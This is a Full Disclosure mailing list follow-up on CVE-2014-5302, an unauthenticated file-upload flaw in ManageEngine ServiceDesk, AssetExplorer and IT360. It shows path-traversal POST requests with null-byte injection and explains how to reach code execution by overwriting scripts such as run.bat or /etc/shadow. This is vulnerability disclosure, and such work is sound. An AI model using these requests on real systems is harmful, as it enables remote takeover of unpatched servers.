Full Disclosure mailing list archives

Re: [The ManageOwnage Series, part XI]: Remote code execution in ServiceDesk, Asset Explorer, Support Center and IT360

From: Pedro Ribeiro <pedrib () gmail com>
Date: Tue, 6 Jan 2015 22:56:40 +0000

On 4 January 2015 at 17:19, Pedro Ribeiro <pedrib () gmail com> wrote:

#2
Vulnerability: Remote code execution via file upload (unauthenticated)
CVE-2014-5302
Constraints: no authentication or any other information needed except
for IT360 (guest account needed); code execution is only possible by
replacing one of the <install_dir>bin/ scripts and waiting for them to
be executed or for a periodic task to run. This is because only text
files can be uploaded as binary files are mangled; and there no JSP
compiler in the $PATH.
Affected versions: ServiceDesk Plus / Plus MSP v7.6 to v9.0 build
9026; AssetExplorer v? to v6.1 build 6106; IT360 v? to v10.4

POST /discoveryServlet/WsDiscoveryServlet?computerName=../bin/run.bat%00
POST /discoveryServlet/WsDiscoveryServlet?computerName=../bin/backUpData.bat%00
<...text file / script payload here...>


Someone has asked me how CVE-2014-5302 can be exploited.

There are 3 things you got to have in mind:
1 - send a null byte (%00) after the file name
2 - send the request as mime type application/octet-stream
3 - send only ASCII data in the request body

Unfortunately it's not as trivial as uploading an ASCII webshell to
the web root. Because of the way these applications are packaged, the
JSP compiler is not set automatically in the PATH/classpath. However,
if you are lucky, the JSP compiler already exists in the
PATH/classpath because of some other application.

Therefore in order to exploit this vulnerability you need to come up
with some clever way like overwriting the run.bat file, uploading a
new /etc/shadow, etc. Note that these apps always run as SYSTEM under
Windows, but they may not run as root in Linux - it depends how they
were installed.

Regards,
Pedro

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

[The ManageOwnage Series, part XI]: Remote code execution in ServiceDesk, Asset Explorer, Support Center and IT360 Pedro Ribeiro (Jan 05)
- Re: [The ManageOwnage Series, part XI]: Remote code execution in ServiceDesk, Asset Explorer, Support Center and IT360 Pedro Ribeiro (Jan 06)